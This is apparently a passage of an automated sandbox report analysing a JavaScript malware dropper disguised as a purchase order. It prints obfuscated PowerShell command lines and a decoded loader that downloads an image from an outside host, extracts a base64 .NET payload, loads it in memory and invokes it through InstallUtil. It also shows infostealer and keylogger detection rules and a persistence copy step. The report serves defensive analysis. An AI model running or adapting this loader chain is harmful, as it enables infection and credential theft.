Source: powershell.exe, 00000003.00000002.1751049132.000001CB86B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85754000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org
Source: powershell.exe, 00000001.00000002.1811360347.00000235007DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
Source: powershell.exe, 00000003.00000002.1751049132.000001CB85AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.142.208.13:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, gmBpn1ecBmQ.cs

.Net Code: cTytqmH

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.powershell.exe.1cb958bf960.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9336
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9336			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_015D41F0	6_2_015D41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_015D4AC0	6_2_015D4AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_015DDE90	6_2_015DDE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_015D3EA8	6_2_015D3EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_068124F1	6_2_068124F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0681E128	6_2_0681E128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_068266C0	6_2_068266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0682B2F0	6_2_0682B2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0682C250	6_2_0682C250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06825258	6_2_06825258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06823120	6_2_06823120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06827E50	6_2_06827E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06827770	6_2_06827770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0682E470	6_2_0682E470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06820040	6_2_06820040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_068259AB	6_2_068259AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_06820038	6_2_06820038

Source: Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Initial sample: Strings found which are bigger than 50

Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.powershell.exe.1cb958bf960.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7552, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, roEs93G.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, roEs93G.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, JQn0Aia1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, JQn0Aia1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.1cb958bf960.1.raw.unpack, YsrmZ97b.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winJS@11/5@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm5vlvn3.2rn.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
